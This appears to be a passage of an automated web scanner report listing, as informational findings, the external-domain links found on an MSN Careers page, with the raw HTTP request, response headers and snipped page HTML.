<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">

            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<div class="cbmsnArticleImage"><img alt="" src="http://emj.icbdr.com/artieimages/8n/ar5l13j6pyt9y9p1td8n.gif" /></div>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=questions+to+ask+during+job+interview&form=ap">Bing: Ask your own questions during the interview</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=how+to+request+a+job+reference&form=ap">Bing: How to request a job reference</a>
...[SNIP]...
</i><a href="http://www.theworkbuzz.com/" target="_blank"><i>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&t=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=Job advice that was true 20 years ago -- but not today&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod&pf=t
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />


<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.235. http://msn.careerbuilder.com/msn/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/msn/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://msn.careerbuilder.com/msn/default.aspx?SiteId=cbmsn_home

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&rf=
http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://download.live.com/?sku=messenger
http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg
http://img.icbdr.com/MediaManagement/DD/I8A3066PC5BVSN70NDD.gif
http://img.icbdr.com/images/MSN/magnifyresume.jpg
http://img.icbdr.com/images/custom/msn/496x120_display.jpg
http://img.icbdr.com/images/custom/msn/Howarejobseekersruiningtheirjobsearch.jpg
http://img.icbdr.com/images/icons/rss.gif
http://img.icbdr.com/v11.89/css/cbglobal.css
http://img.icbdr.com/v11.89/css/cbminisite/cbminisiteinternal.css
http://img.icbdr.com/v11.89/css/msn_full.css
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://money.redacted/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerrookie.com/CC/Default.aspx?sc_cmp2=JS_MsnCareerRookie
http://msn.empleoscb.com/
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalcareers.112.2o7.net/b/ss/msnportalcareers/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://office.microsoft.com/en-us/templates/CT101448941033.aspx
http://office.microsoft.com/en-us/templates/results.aspx?qu=resume+cover+letters&av=TPL000
http://realestate.redacted/
http://realestate.redacted/article.aspx?cp-documentid=27225933
http://rss.redacted/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript
http://specials.redacted/alphabet.aspx
http://thebubble.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=AP
http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc
http://www.delish.com/
http://www.delish.com/food-fun/best-burgers
http://www.erieri.com/
http://www.facebook.com/careerbuilder?v=app_28134323652
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /msn/default.aspx?SiteId=cbmsn_home HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67762
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f2bc2969dbf945128e5dbca1246ed7bf-349642128-w9-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842C6B6C517D8E2441CD1935037681432834654112582D57168177A65DC6D655EA3332BD0BD468B1520; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR9
Date: Sat, 29 Jan 2011 23:48:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbminisite/cbminisiteinternal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">

            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<li><a href="http://msn.careerrookie.com/CC/Default.aspx?sc_cmp2=JS_MsnCareerRookie">Entry Level & Internships</a>
...[SNIP]...
<div>

<img src="http://img.icbdr.com/images/MSN/magnifyresume.jpg" alt="Jobs galore on MSN Careers, image .. Getty Images" />

<a href="http://msn.careerbuilder.com/custom/msn/postresume.aspx?siteid=cbmsnchPR" title="Let us work for you">
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/CT101448941033.aspx">Download r..sum.. templates</a>
...[SNIP]...
<li><a href="http://office.microsoft.com/en-us/templates/results.aspx?qu=resume+cover+letters&av=TPL000">Download cover letter templates</a>
...[SNIP]...
<div class="linkedimg">
<a href="http://www.facebook.com/careerbuilder?v=app_28134323652" title="flip pane">
<img src="http://img.icbdr.com/images/custom/msn/496x120_display.jpg"width="528" height="120" alt="Contest" /></a>
...[SNIP]...
<div id="featuredArticleLeft" class="clearfix">

<img src="http://img.icbdr.com/images/custom/msn/Howarejobseekersruiningtheirjobsearch.jpg" alt="Jobs" style="float: none;" /><br />
...[SNIP]...
<a href="http://msn.careerbuilder.com/harvest/rss/rssarticlefeed.aspx?type=MSN&count=10&siteid=cbmsnRSS"><img src="http://img.icbdr.com/images/icons/rss.gif" /></a>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl0_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<span><img id="InnerMiddle_mxsFeatEmp__ctl1_ImgFeatEmpLogo" src="http://img.icbdr.com/MediaManagement/DD/I8A3066PC5BVSN70NDD.gif" border="0" style="border-style:None;height:60px;width:135px;" /></span>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<div id="LastBingLink">
<a href="http://local.msn.com/news.aspx"><span class="BingLink">
...[SNIP]...
<input name="btnSubmit" id="btnSubmit" title="Salary Calculator" src="http://img.icbdr.com/images/plink/cbsalary/btn_search.png" style="border-width: 0px; height: 33px;" type="image" />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<br />
<a class="cbSal_sources" href="http://www.erieri.com/">Salary Survey Sources</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.236. http://msn.careerbuilder.com/msn/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/msn/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://msn.careerbuilder.com/msn/default.aspx?SiteId=cbmsn_home

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&rf=
http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath
http://careers.redacted/
